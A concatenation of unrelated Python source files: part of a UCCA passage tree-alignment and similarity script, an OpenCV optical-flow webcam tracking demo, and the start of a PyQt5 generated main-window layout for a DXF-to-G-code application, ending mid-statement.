    longer = max(len(top1), len(top2))
    shorter = min(len(top1), len(top2))
    res1 = []
    res2 = []
    for i in range(shorter):
        t1, t2 = tree_structure_aligned(tree1[i], tree2[i], word2word)
        res1.append(t1)
        res2.append(t2)
    # surplus tops of the longer side become plain (unaligned) subtrees
    if len(top1) == longer:
        res1 += [tree_structure(n) for n in top1[shorter:]]
    if len(top2) == longer:
        res2 += [tree_structure(n) for n in top2[shorter:]]
    # drop leaves, then drop non-comparable childless subtrees
    res1 = prune_leaves((p1, res1))
    res2 = prune_leaves((p2, res2))
    res1 = prune_leaves(res1, lambda x: not is_comparable(x))
    res2 = prune_leaves(res2, lambda x: not is_comparable(x))
    return res1, res2
def aligned_edit_distance(p1, p2):
    """Labeled tree edit distance between the aligned ordered trees of two passages."""
    left, right = create_ordered_trees(p1, p2)
    return zss.simple_distance(convert_structure_to_zss(left),
                               convert_structure_to_zss(right))
def token_level_similarity(p1, p2):
    """Token-level per-tag F-scores for a single passage pair (see token_level_analysis)."""
    return token_level_analysis([p1, p2])
def token_level_analysis(ps):
    """ takes a list of passages and computes the different token-level analysis

    ps -- a flat list interpreted as consecutive pairs:
        (ps[0], ps[1]), (ps[2], ps[3]), ...
    Returns a dict tag -> F1 score of per-tag node counts over all pairs.
    """
    s, e, f = {}, {}, {}  # shared / expected (side 2) / found (side 1) counts
    i = 0
    while i < len(ps):
        p1 = ps[i]
        i += 1
        p2 = ps[i]
        i += 1
        # per-tag counts of comparable nodes on each side of the pair
        count1 = Counter((label(node) for node in p1.layer(layer1.LAYER_ID).all if is_comparable(node)))
        count2 = Counter((label(node) for node in p2.layer(layer1.LAYER_ID).all if is_comparable(node)))
        for tag in MAIN_RELATIONS:
            f[tag] = f.get(tag, 0) + count1[tag]
            e[tag] = e.get(tag, 0) + count2[tag]
            s[tag] = s.get(tag, 0) + min(count1[tag], count2[tag])
    # combined bucket for participants + adverbials
    ADs = "As + Ds"
    s[ADs] = s[layer1.EdgeTags.Participant] + s[layer1.EdgeTags.Adverbial]
    e[ADs] = e[layer1.EdgeTags.Participant] + e[layer1.EdgeTags.Adverbial]
    f[ADs] = f[layer1.EdgeTags.Participant] + f[layer1.EdgeTags.Adverbial]
    P = {}
    R = {}
    res = {}
    for tag in MAIN_RELATIONS + [ADs]:
        # NOTE(review): divides by zero when a tag never occurs on one side --
        # presumably inputs always contain every main relation; confirm.
        P[tag] = s[tag] / f[tag]
        R[tag] = s[tag] / e[tag]
        res[tag] = 2 * (P[tag] * R[tag]) / (P[tag] + R[tag])
    return res
def aligned_top_down_distance(p1, p2):
    """starts from the heads of both passages
    and finds the amount of nodes
    containing the same labeles for children

    Descends the aligned node pairs top-down, collecting the maximal "cut" of
    matching pairs, then keeps descending below mismatches only to count the
    remaining comparable nodes. Returns a two-sided F-score of cut size over
    the comparable nodes visited on each side.
    """
    word2word = align_yields(p1, p2)
    remaining = align_nodes(top_from_passage(p1), top_from_passage(p2), word2word)
    uncounted = {}   # aligned pairs below a mismatch, still to be tallied
    cut1 = set()
    cut2 = set()
    overall1 = set()
    overall2 = set()
    # top down create find the maximum cut of matching nodes
    while remaining:
        n1, n2 = remaining.popitem()
        if is_comparable(n1) and is_comparable(n2):
            # remember overall nodes
            overall1.add(n1)
            overall2.add(n2)
            if compare(n1, n2):
                cut1.add(n1)
                cut2.add(n2)
                remaining.update(align_nodes(n1.children, n2.children, word2word))
            else:
                # remember the end of the cut
                uncounted.update(align_nodes(n1.children, n2.children, word2word))
        elif (not is_terminal(n1)) and (not is_terminal(n2)):
            # non-comparable internal pair: keep descending without counting it
            remaining.update(align_nodes(n1.children, n2.children, word2word))
    # check nodes not in the cut
    while uncounted:
        n1, n2 = uncounted.popitem()
        if is_comparable(n1) and is_comparable(n2):
            overall1.add(n1)
            overall2.add(n2)
        if (not is_terminal(n1)) and (not is_terminal(n2)):
            uncounted.update(align_nodes(n1.children, n2.children, word2word))
    # overall1 = set(node for node in p1.layer(layer1.LAYER_ID).all if is_comparable(node))
    # overall2 = set(node for node in p2.layer(layer1.LAYER_ID).all if is_comparable(node))
    print(inspect.currentframe().f_code.co_name)
    print(len(set(node for node in p1.layer(layer1.LAYER_ID).all if is_comparable(node))))
    print(len(set(node for node in p2.layer(layer1.LAYER_ID).all if is_comparable(node))))
    print("counts", len(cut1), len(cut2))
    print("lens", len(overall1), len(overall2))
    print(two_sided_f(len(cut1), len(cut2), len(overall1), len(overall2)))
    return two_sided_f(len(cut1), len(cut2), len(overall1), len(overall2))
| danielhers/ucca | scripts/distances/align.py | Python | gpl-3.0 | 23,754 |
import numpy as np
import cv2

# Lucas-Kanade sparse optical flow demo: track Shi-Tomasi corners in a webcam
# feed and draw their trajectories until ESC is pressed.

cap = cv2.VideoCapture(0)

# params for ShiTomasi corner detection
feature_params = dict(maxCorners=100,
                      qualityLevel=0.3,
                      minDistance=7,
                      blockSize=7)

# Parameters for Lucas-Kanade optical flow
lk_params = dict(winSize=(15, 15),
                 maxLevel=2,
                 criteria=(cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 0.03))

# Create some random colors (one per tracked corner)
color = np.random.randint(0, 255, (100, 3))

# Take first frame and find corners in it
ret, old_frame = cap.read()
if not ret:  # fail fast instead of crashing inside cvtColor
    cap.release()
    raise RuntimeError("could not read an initial frame from the capture device")
old_gray = cv2.cvtColor(old_frame, cv2.COLOR_BGR2GRAY)
p0 = cv2.goodFeaturesToTrack(old_gray, mask=None, **feature_params)

# Create a mask image for drawing purposes
mask = np.zeros_like(old_frame)

while True:
    ret, frame = cap.read()
    if not ret:  # camera unplugged or stream ended
        break
    frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)

    # re-detect features if every track has been lost
    if p0 is None or len(p0) == 0:
        p0 = cv2.goodFeaturesToTrack(old_gray, mask=None, **feature_params)
        if p0 is None:
            old_gray = frame_gray.copy()
            continue

    # calculate optical flow
    p1, st, err = cv2.calcOpticalFlowPyrLK(old_gray, frame_gray, p0, None, **lk_params)

    # Select good points
    good_new = p1[st == 1]
    good_old = p0[st == 1]

    # draw the tracks (OpenCV drawing functions require integer coordinates)
    for i, (new, old) in enumerate(zip(good_new, good_old)):
        a, b = (int(v) for v in new.ravel())
        c, d = (int(v) for v in old.ravel())
        mask = cv2.line(mask, (a, b), (c, d), color[i].tolist(), 2)
        frame = cv2.circle(frame, (a, b), 5, color[i].tolist(), -1)
    img = cv2.add(frame, mask)

    cv2.imshow('frame', img)
    k = cv2.waitKey(30) & 0xff
    if k == 27:  # ESC quits
        break

    # Now update the previous frame and previous points
    old_gray = frame_gray.copy()
    p0 = good_new.reshape(-1, 1, 2)

cap.release()
cv2.destroyAllWindows()
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file '/tmp/tmpqVBIL1'
#
# Created by: PyQt5 UI code generator 5.5
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.setWindowModality(QtCore.Qt.NonModal)
MainWindow.resize(800, 600)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(":/images/DXF2GCODE-001.ico"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
MainWindow.setWindowIcon(icon)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.centralwidget)
self.verticalLayout.setContentsMargins(-1, -1, -1, 2)
self.verticalLayout.setSpacing(6)
self.verticalLayout.setObjectName("verticalLayout")
self.splitter = QtWidgets.QSplitter(self.centralwidget)
self.splitter.setOrientation(QtCore.Qt.Horizontal)
self.splitter.setChildrenCollapsible(False)
self.splitter.setObjectName("splitter")
self.mytabWidget = QtWidgets.QTabWidget(self.splitter)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(2)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.mytabWidget.sizePolicy().hasHeightForWidth())
self.mytabWidget.setSizePolicy(sizePolicy)
self.mytabWidget.setMinimumSize(QtCore.QSize(200, 0))
self.mytabWidget.setAutoFillBackground(False)
self.mytabWidget.setObjectName("mytabWidget")
self.tab = QtWidgets.QWidget()
self.tab.setObjectName("tab")
self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.tab)
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.horizontalLayout_5 = QtWidgets.QHBoxLayout()
self.horizontalLayout_5.setSpacing(1)
self.horizontalLayout_5.setObjectName("horizontalLayout_5")
self.blocksCollapsePushButton = QtWidgets.QPushButton(self.tab)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.blocksCollapsePushButton.sizePolicy().hasHeightForWidth())
self.blocksCollapsePushButton.setSizePolicy(sizePolicy)
icon1 = QtGui.QIcon()
icon1.addPixmap(QtGui.QPixmap(":/images/collapse-all.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.blocksCollapsePushButton.setIcon(icon1)
self.blocksCollapsePushButton.setIconSize(QtCore.QSize(24, 24))
self.blocksCollapsePushButton.setObjectName("blocksCollapsePushButton")
self.horizontalLayout_5.addWidget(self.blocksCollapsePushButton)
self.blocksExpandPushButton = QtWidgets.QPushButton(self.tab)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.blocksExpandPushButton.sizePolicy().hasHeightForWidth())
self.blocksExpandPushButton.setSizePolicy(sizePolicy)
icon2 = QtGui.QIcon()
icon2.addPixmap(QtGui.QPixmap(":/images/expand-all.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.blocksExpandPushButton.setIcon(icon2)
self.blocksExpandPushButton.setIconSize(QtCore.QSize(24, 24))
self.blocksExpandPushButton.setObjectName("blocksExpandPushButton")
self.horizontalLayout_5.addWidget(self.blocksExpandPushButton)
spacerItem = QtWidgets.QSpacerItem(13, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_5.addItem(spacerItem)
self.verticalLayout_3.addLayout(self.horizontalLayout_5)
self.entitiesTreeView = TreeView(self.tab)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.entitiesTreeView.sizePolicy().hasHeightForWidth())
self.entitiesTreeView.setSizePolicy(sizePolicy)
self.entitiesTreeView.setObjectName("entitiesTreeView")
self.verticalLayout_3.addWidget(self.entitiesTreeView)
self.mytabWidget.addTab(self.tab, "")
self.tab_2 = QtWidgets.QWidget()
self.tab_2.setObjectName("tab_2")
self.verticalLayout_5 = QtWidgets.QVBoxLayout(self.tab_2)
self.verticalLayout_5.setContentsMargins(5, 5, 5, 5)
self.verticalLayout_5.setSpacing(1)
self.verticalLayout_5.setObjectName("verticalLayout_5")
self.horizontalLayout_4 = QtWidgets.QHBoxLayout()
self.horizontalLayout_4.setSpacing(1)
self.horizontalLayout_4.setObjectName("horizontalLayout_4")
self.layersCollapsePushButton = QtWidgets.QPushButton(self.tab_2)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.layersCollapsePushButton.sizePolicy().hasHeightForWidth())
self.layersCollapsePushButton.setSizePolicy(sizePolicy)
self.layersCollapsePushButton.setIcon(icon1)
self.layersCollapsePushButton.setIconSize(QtCore.QSize(24, 24))
self.layersCollapsePushButton.setObjectName("layersCollapsePushButton")
self.horizontalLayout_4.addWidget(self.layersCollapsePushButton)
self.layersExpandPushButton = QtWidgets.QPushButton(self.tab_2)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.layersExpandPushButton.sizePolicy().hasHeightForWidth())
self.layersExpandPushButton.setSizePolicy(sizePolicy)
self.layersExpandPushButton.setIcon(icon2)
self.layersExpandPushButton.setIconSize(QtCore.QSize(24, 24))
self.layersExpandPushButton.setObjectName("layersExpandPushButton")
self.horizontalLayout_4.addWidget(self.layersExpandPushButton)
spacerItem1 = QtWidgets.QSpacerItem(13, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_4.addItem(spacerItem1)
self.layersGoUpPushButton = QtWidgets.QPushButton(self.tab_2)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.layersGoUpPushButton.sizePolicy().hasHeightForWidth())
self.layersGoUpPushButton.setSizePolicy(sizePolicy)
icon3 = QtGui.QIcon()
icon3.addPixmap(QtGui.QPixmap(":/images/go-up.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.layersGoUpPushButton.setIcon(icon3)
self.layersGoUpPushButton.setIconSize(QtCore.QSize(24, 24))
self.layersGoUpPushButton.setObjectName("layersGoUpPushButton")
self.horizontalLayout_4.addWidget(self.layersGoUpPushButton)
self.layersGoDownPushButton = QtWidgets.QPushButton(self.tab_2)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.layersGoDownPushButton.sizePolicy().hasHeightForWidth())
self.layersGoDownPushButton.setSizePolicy(sizePolicy)
icon4 = QtGui.QIcon()
icon4.addPixmap(QtGui.QPixmap(":/images/go-down.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.layersGoDownPushButton.setIcon(icon4)
self.layersGoDownPushButton.setIconSize(QtCore.QSize(24, 24))
self.layersGoDownPushButton.setObjectName("layersGoDownPushButton")
self.horizontalLayout_4.addWidget(self.layersGoDownPushButton)
self.verticalLayout_5.addLayout(self.horizontalLayout_4)
self.layersShapesTreeView = TreeView(self.tab_2)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.layersShapesTreeView.sizePolicy().hasHeightForWidth())
self.layersShapesTreeView.setSizePolicy(sizePolicy)
self.layersShapesTreeView.setObjectName("layersShapesTreeView")
self.verticalLayout_5.addWidget(self.layersShapesTreeView)
self.millSettingsFrame = QtWidgets.QFrame(self.tab_2)
self.millSettingsFrame.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.millSettingsFrame.setFrameShadow(QtWidgets.QFrame.Raised)
self.millSettingsFrame.setLineWidth(0)
self.millSettingsFrame.setObjectName("millSettingsFrame")
self.verticalLayout_4 = QtWidgets.QVBoxLayout(self.millSettingsFrame)
self.verticalLayout_4.setContentsMargins(2, 2, 2, 2)
self.verticalLayout_4.setSpacing(0)
self.verticalLayout_4.setObjectName("verticalLayout_4")
self.horizontalLayout_3 = QtWidgets.QHBoxLayout()
self.horizontalLayout_3.setSpacing(2)
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
self.toolDiameterComboBox = QtWidgets.QComboBox(self.millSettingsFrame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.toolDiameterComboBox.sizePolicy().hasHeightForWidth())
self.toolDiameterComboBox.setSizePolicy(sizePolicy)
self.toolDiameterComboBox.setMaxVisibleItems(20)
self.toolDiameterComboBox.setObjectName("toolDiameterComboBox")
self.horizontalLayout_3.addWidget(self.toolDiameterComboBox)
self.verticalLayout_2 = QtWidgets.QVBoxLayout()
self.verticalLayout_2.setSpacing(0)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.label_11 = QtWidgets.QLabel(self.millSettingsFrame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_11.sizePolicy().hasHeightForWidth())
self.label_11.setSizePolicy(sizePolicy)
self.label_11.setObjectName("label_11")
self.horizontalLayout.addWidget(self.label_11)
self.toolDiameterLabel = QtWidgets.QLabel(self.millSettingsFrame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.toolDiameterLabel.sizePolicy().hasHeightForWidth())
self.toolDiameterLabel.setSizePolicy(sizePolicy)
self.toolDiameterLabel.setText("[mm]")
self.toolDiameterLabel.setObjectName("toolDiameterLabel")
self.horizontalLayout.addWidget(self.toolDiameterLabel)
self.label_12 = QtWidgets.QLabel(self.millSettingsFrame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_12.sizePolicy().hasHeightForWidth())
self.label_12.setSizePolicy(sizePolicy)
self.label_12.setObjectName("label_12")
self.horizontalLayout.addWidget(self.label_12)
self.toolSpeedLabel = QtWidgets.QLabel(self.millSettingsFrame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.toolSpeedLabel.sizePolicy().hasHeightForWidth())
self.toolSpeedLabel.setSizePolicy(sizePolicy)
self.toolSpeedLabel.setText("[rpm]")
self.toolSpeedLabel.setObjectName("toolSpeedLabel")
self.horizontalLayout.addWidget(self.toolSpeedLabel)
self.verticalLayout_2.addLayout(self.horizontalLayout)
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.label_13 = QtWidgets.QLabel(self.millSettingsFrame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_13.sizePolicy().hasHeightForWidth())
self.label_13.setSizePolicy(sizePolicy)
self.label_13.setObjectName("label_13")
self.horizontalLayout_2.addWidget(self.label_13)
self.startRadiusLabel = QtWidgets.QLabel(self.millSettingsFrame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.startRadiusLabel.sizePolicy().hasHeightForWidth())
self.startRadiusLabel.setSizePolicy(sizePolicy)
self.startRadiusLabel.setText("[mm]")
self.startRadiusLabel.setObjectName("startRadiusLabel")
self.horizontalLayout_2.addWidget(self.startRadiusLabel)
self.verticalLayout_2.addLayout(self.horizontalLayout_2)
self.horizontalLayout_3.addLayout(self.verticalLayout_2)
self.verticalLayout_4.addLayout(self.horizontalLayout_3)
self.gridLayout = QtWidgets.QGridLayout()
self.gridLayout.setHorizontalSpacing(2)
self.gridLayout.setVerticalSpacing(0)
self.gridLayout.setObjectName("gridLayout")
self.zInitialMillDepthLineEdit = QtWidgets.QLineEdit(self.millSettingsFrame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.zInitialMillDepthLineEdit.sizePolicy().hasHeightForWidth())
self.zInitialMillDepthLineEdit.setSizePolicy(sizePolicy)
self.zInitialMillDepthLineEdit.setObjectName("zInitialMillDepthLineEdit")
self.gridLayout.addWidget(self.zInitialMillDepthLineEdit, 4, 1, 1, 1)
self.horizontalLayout_13 = QtWidgets.QHBoxLayout()
self.horizontalLayout_13.setContentsMargins(0, -1, 0, -1)
self.horizontalLayout_13.setSpacing(2)
self.horizontalLayout_13.setObjectName("horizontalLayout_13")
self.label_7 = QtWidgets.QLabel(self.millSettingsFrame)
self.label_7.setWordWrap(True)
self.label_7.setObjectName("label_7")
self.horizontalLayout_13.addWidget(self.label_7)
self.unitLabel_8 = QtWidgets.QLabel(self.millSettingsFrame)
self.unitLabel_8.setText("[mm/min]")
self.unitLabel_8.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.unitLabel_8.setObjectName("unitLabel_8")
self.horizontalLayout_13.addWidget(self.unitLabel_8)
self.gridLayout.addLayout(self.horizontalLayout_13, 7, 0, 1, 1)
self.horizontalLayout_12 = QtWidgets.QHBoxLayout()
self.horizontalLayout_12.setContentsMargins(0, -1, 0, -1)
self.horizontalLayout_12.setSpacing(2)
self.horizontalLayout_12.setObjectName("horizontalLayout_12")
self.label_8 = QtWidgets.QLabel(self.millSettingsFrame)
self.label_8.setObjectName("label_8")
self.horizontalLayout_12.addWidget(self.label_8)
self.unitLabel_7 = QtWidgets.QLabel(self.millSettingsFrame)
self.unitLabel_7.setText("[mm]")
self.unitLabel_7.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.unitLabel_7.setObjectName("unitLabel_7")
self.horizontalLayout_12.addWidget(self.unitLabel_7)
self.gridLayout.addLayout(self.horizontalLayout_12, 6, 0, 1, 1)
self.zInfeedDepthLineEdit = QtWidgets.QLineEdit(self.millSettingsFrame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.zInfeedDepthLineEdit.sizePolicy().hasHeightForWidth())
self.zInfeedDepthLineEdit.setSizePolicy(sizePolicy)
self.zInfeedDepthLineEdit.setObjectName("zInfeedDepthLineEdit")
self.gridLayout.addWidget(self.zInfeedDepthLineEdit, 5, 1, 1, 1)
self.horizontalLayout_11 = QtWidgets.QHBoxLayout()
self.horizontalLayout_11.setContentsMargins(0, -1, 0, -1)
self.horizontalLayout_11.setSpacing(2)
self.horizontalLayout_11.setObjectName("horizontalLayout_11")
self.label_9 = QtWidgets.QLabel(self.millSettingsFrame)
self.label_9.setObjectName("label_9")
self.horizontalLayout_11.addWidget(self.label_9)
self.unitLabel_6 = QtWidgets.QLabel(self.millSettingsFrame)
self.unitLabel_6.setText("[mm]")
self.unitLabel_6.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.unitLabel_6.setObjectName("unitLabel_6")
self.horizontalLayout_11.addWidget(self.unitLabel_6)
self.gridLayout.addLayout(self.horizontalLayout_11, 5, 0, 1, 1)
self.zSafetyMarginLineEdit = QtWidgets.QLineEdit(self.millSettingsFrame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.zSafetyMarginLineEdit.sizePolicy().hasHeightForWidth())
self.zSafetyMarginLineEdit.setSizePolicy(sizePolicy)
self.zSafetyMarginLineEdit.setObjectName("zSafetyMarginLineEdit")
self.gridLayout.addWidget(self.zSafetyMarginLineEdit, 3, 1, 1, 1)
self.zFinalMillDepthLineEdit = QtWidgets.QLineEdit(self.millSettingsFrame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.zFinalMillDepthLineEdit.sizePolicy().hasHeightForWidth())
self.zFinalMillDepthLineEdit.setSizePolicy(sizePolicy)
self.zFinalMillDepthLineEdit.setObjectName("zFinalMillDepthLineEdit")
self.gridLayout.addWidget(self.zFinalMillDepthLineEdit, 6, 1, 1, 1)
self.horizontalLayout_9 = QtWidgets.QHBoxLayout()
self.horizontalLayout_9.setContentsMargins(0, -1, 0, -1)
self.horizontalLayout_9.setSpacing(2)
self.horizontalLayout_9.setObjectName("horizontalLayout_9")
self.label_5 = QtWidgets.QLabel(self.millSettingsFrame)
self.label_5.setObjectName("label_5")
self.horizontalLayout_9.addWidget(self.label_5)
self.unitLabel_4 = QtWidgets.QLabel(self.millSettingsFrame)
self.unitLabel_4.setText("[mm]")
self.unitLabel_4.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.unitLabel_4.setObjectName("unitLabel_4")
self.horizontalLayout_9.addWidget(self.unitLabel_4)
self.gridLayout.addLayout(self.horizontalLayout_9, 3, 0, 1, 1)
self.zRetractionArealLineEdit = QtWidgets.QLineEdit(self.millSettingsFrame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.zRetractionArealLineEdit.sizePolicy().hasHeightForWidth())
self.zRetractionArealLineEdit.setSizePolicy(sizePolicy)
self.zRetractionArealLineEdit.setObjectName("zRetractionArealLineEdit")
self.gridLayout.addWidget(self.zRetractionArealLineEdit, 2, 1, 1, 1)
self.horizontalLayout_8 = QtWidgets.QHBoxLayout()
self.horizontalLayout_8.setContentsMargins(0, -1, 0, -1)
self.horizontalLayout_8.setSpacing(2)
self.horizontalLayout_8.setObjectName("horizontalLayout_8")
self.label_6 = QtWidgets.QLabel(self.millSettingsFrame)
self.label_6.setObjectName("label_6")
self.horizontalLayout_8.addWidget(self.label_6)
self.unitLabel_3 = QtWidgets.QLabel(self.millSettingsFrame)
self.unitLabel_3.setText("[mm]")
self.unitLabel_3.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.unitLabel_3.setObjectName("unitLabel_3")
self.horizontalLayout_8.addWidget(self.unitLabel_3)
self.gridLayout.addLayout(self.horizontalLayout_8, 2, 0, 1, 1)
self.horizontalLayout_10 = QtWidgets.QHBoxLayout()
self.horizontalLayout_10.setContentsMargins(0, -1, 0, -1)
self.horizontalLayout_10.setSpacing(2)
self.horizontalLayout_10.setObjectName("horizontalLayout_10")
self.label_14 = QtWidgets.QLabel(self.millSettingsFrame)
self.label_14.setObjectName("label_14")
self.horizontalLayout_10.addWidget(self.label_14)
self.unitLabel_5 = QtWidgets.QLabel(self.millSettingsFrame)
self.unitLabel_5.setText("[mm]")
self.unitLabel_5.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.unitLabel_5.setObjectName("unitLabel_5")
self.horizontalLayout_10.addWidget(self.unitLabel_5)
self.gridLayout.addLayout(self.horizontalLayout_10, 4, 0, 1, 1)
self.g1FeedZLineEdit = QtWidgets.QLineEdit(self.millSettingsFrame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.g1FeedZLineEdit.sizePolicy().hasHeightForWidth())
self.g1FeedZLineEdit.setSizePolicy(sizePolicy)
self.g1FeedZLineEdit.setObjectName("g1FeedZLineEdit")
self.gridLayout.addWidget(self.g1FeedZLineEdit, 8, 1, 1, 1)
self.horizontalLayout_6 = QtWidgets.QHBoxLayout()
self.horizontalLayout_6.setContentsMargins(0, -1, 0, -1)
self.horizontalLayout_6.setSpacing(2)
self.horizontalLayout_6.setObjectName("horizontalLayout_6")
self.startAtXLabel = QtWidgets.QLabel(self.millSettingsFrame)
self.startAtXLabel.setObjectName("startAtXLabel")
self.horizontalLayout_6.addWidget(self.startAtXLabel)
self.unitLabel_1 = QtWidgets.QLabel(self.millSettingsFrame)
self.unitLabel_1.setText("[mm]")
self.unitLabel_1.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.unitLabel_1.setObjectName("unitLabel_1")
self.horizontalLayout_6.addWidget(self.unitLabel_1)
self.gridLayout.addLayout(self.horizontalLayout_6, 0, 0, 1, 1)
self.startAtYLineEdit = QtWidgets.QLineEdit(self.millSettingsFrame)
